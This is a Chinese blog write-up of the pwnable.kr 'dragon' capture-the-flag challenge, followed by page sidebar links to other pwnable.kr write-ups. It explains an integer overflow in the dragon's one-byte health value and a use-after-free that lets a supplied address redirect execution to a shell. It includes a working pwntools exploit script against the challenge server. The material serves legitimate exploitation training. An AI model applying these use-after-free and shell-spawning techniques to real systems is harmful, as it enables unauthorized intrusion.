pwnable.kr dragon writeup

最新推荐文章于 2021-01-29 11:14:42 发布
最新推荐文章于 2021-01-29 11:14:42 发布
阅读量190 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/95736290
版权

丢进IDA里进行分析
程序的逻辑是:
先出现小龙,50HP, 30 damage, 每回合恢复5点血量
可选择人物牧师 或者骑士
牧师的技能:
1.给龙造成20点伤害,耗10点MP
2.恢复50点MP, 耗0点MP
3.一回合无敌,耗25点MP(非常250的技能)

骑士的技能:
1.给龙造成20点伤害
2.给龙造成40点伤害,同时自伤20点HP(杀敌40,自损20,也非常250)

这两个人物的技能靠程序逻辑无法杀龙,只能寻找程序漏洞
在这里插入图片描述
由于龙的血量是一个大小为一个字节的变量存储的,范围为-128~127,这个时候就可以想到整数溢出了,杀龙的判定是龙的血量小于等于0,牧师的3技能与2技能组合起来 能奶龙 4*12 + 8 = 56点HP, 母龙的HP为80, 足够把它奶死了
第一阶段漏洞利用思路:
先用骑士献祭
然后刷出母龙
再上牧师,把母龙奶死,进入如下分支
在这里插入图片描述
把母龙奶死后,会把指向龙的数据的堆区域给释放掉,但是这个分支里却使用了这个指针,触发了uaf漏洞,在给v2分配空间的时候会重用那个堆区域,
所以我们只要输入调用system函数的地址就可以getshell了

Exp:

from pwn import *

context.log_level = 'debug'
#context.terminal = ['tmux', 'splitw', '-h']
#gdb.attach(proc.pidof(p)[0], gdbscript="b main")

p = remote("pwnable.kr", 9004)


def killdragon():
    p.recvuntil("[ 2 ] Knight\n")
    p.sendline("2")
    p.recvuntil("20 HP.\n")
    p.sendline("2")
    p.recvuntil("[ 2 ] Knight\n")
    p.sendline("1")
    for i in range(4):
        for j in range(2):
            p.recvuntil("You Become Temporarily Invincible.\n")
            p.sendline("3")
        p.recvuntil("You Become Temporarily Invincible.\n")
        p.sendline("2")

killdragon()
p.recvuntil("The World Will Remember You As:\n")
payload = p32(0x08048DBF)

p.sendline(payload)

p.interactive()
苍崎青子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1652
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
pwnable.kr-random-Writeup
airfish20000的博客
02-08 370
MarkdownPad Document pwnable.kr-random-Writeup 与前几题套路相同,ssh远程登录,ls -l查看文件及权限,cat获得C代码如下: 1 #include 2 3 int main(){ 4 unsigned int random; 5 random = rand(); // random va
pwnable.kr-cmd1 writeup
Yale的博客
02-05 267
看看源码 在main中可以看到我们输入的参数可以通过调用system执行 但是在传给system执行前,输入的内容会被filter处理 而filter过滤了tmp,flag,sh这些关键字 而且还有一点需要注意的是,我们绕过filter之后,还得注意main中的putenv,它将PATH环境变量设置为了乱七八糟的东西 PATH决定了shell将到哪些目录中寻找命令或程序,PATH的值...
[WriteUp] pwnable.kr -- [fd]
qq_23026851的博客
07-23 356
题目: 解: ssh 登录远程服务器。密码:guest。 ls -al 发现没有权限运行flag,但可以读fd的源码。如下。 显然,这里的目标就是想办法让buf的值等于“LETMEWIN\n”。如何做到?我注意到有read(fd, buf, 32)这个函数,作用是读取fd所代表的文件,并把其中一定量的字符(这里是32个)放到buf中。OK,所以我只要构造出内容为“LETMEWIN\n”...
pwnable.kr simple login writeup
lxx_nico的专栏
09-17 1220
pwnable.kr simple login writeup虽然说是pt150但是还是让我学到很多东西的。这是一个判定特定字符串的程序,直接说溢出点吧。输入的字符会经过一个base64解码,溢出点在auth的memcpy,只能够有4个字节的溢出,这么少怎么弄? 参考了大神思路。http://www.cnblogs.com/anewid/p/4567242.html 我们只能溢出4个字
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1725
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
pwnable.kr 4.flag writeup
ditto的博客
12-15 556
没涉及到pwn,就是一道逆向题目。 拿到题目 访问 http://pwnable.kr/bin/flag 下载文件。。 下载得到flag文件,无后缀,记事本打开,发现是elf文件,改后缀为elf。用IDA打开查看汇编代码。 发现加了壳,打开字符串窗口看看有没有信息,(shift 加上f12快捷键打开,或者 在这里找到字符串窗口并打开, 随便一翻就看到了关键字upx,看来应该是upx的壳,用...
pwnable.kr 2.collision writeup
ditto的博客
12-12 489
拿到题目 先连上去。 ls查看目录得到 cat 查看下col.c的源代码 #include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; //这里将...
简单易懂的 pwnable.kr 第一题[fd]Writeupt
Y_peak的博客
11-24 574
pwnable.kr 第一题[fd]Writeupt 题目地址http://pwnable.kr/play.php 题目
pwnable.kr解题write up —— Toddler's Bottle(一)
逆水行舟
01-18 6729
网站地址:pwnable.kr 提供许多优质的ctf训练题,题目设计的都非常巧妙,适合思考。
简单易懂的 pwnable.kr 第三题[bof]Writeupt
Y_peak的博客
01-29 406
简单易懂的 pwnable.kr 第三题[bof]Writeupt 题目地址:http://pwnable.kr/play.php 点开题目发现: 他给了提示覆盖,并且给了两个网址。分别打开,第一个给了你一个下载文件bof。第二个是文件的源文件。 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("ov
fd_WriteUp(pwnable.kr——fd)Linux文件描述符
Hvnt3r的博客
07-13 458
fd_WriteUp(pwnable.kr——fd详细解析) 本题目来自:http://pwnable.kr/play.php 首先根据题目提示使用 ssh fd@pwnable.kr -p2222 来连接到目标服务器,密码为guest ls一下发现当前目录下有三个文件,一看到flag字样的文件名就下意识的cat flag但是发现没有读取权限,而除了flag文件外还有一个源码...
input_WriteUp(pwnable.kr_input)文件的输入
Hvnt3r的博客
08-07 302
本题代码很长 题面 Mom? how can I pass my input to a computer program? ssh input2@pwnable.kr -p2222 (pw:guest) 代码 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include ...
pwnable.kr第二遍---input
leeham的博客
03-16 569
&gt;&gt;&gt;input1.命令whoami---input2groups---input2ls -l:发现其他用户对input2可执行文件没有执行权限;只对文件owner和input2组用户有该权限;然后发现input2用户也位于input2-group中2.字符与数字之间的转换各进制之间的转换chr ord bin oct int hex字符和ascii:chr ord转成十进制:i...
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2236
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4865
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3012
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1766
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
2019 红帽杯 three 经验总结
qq_43189757的博客
11-11 1379
这题感觉要对汇编语言要比较熟悉会更容易做出来… 程序逻辑分析: 前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中 在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag 利用思路: 通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值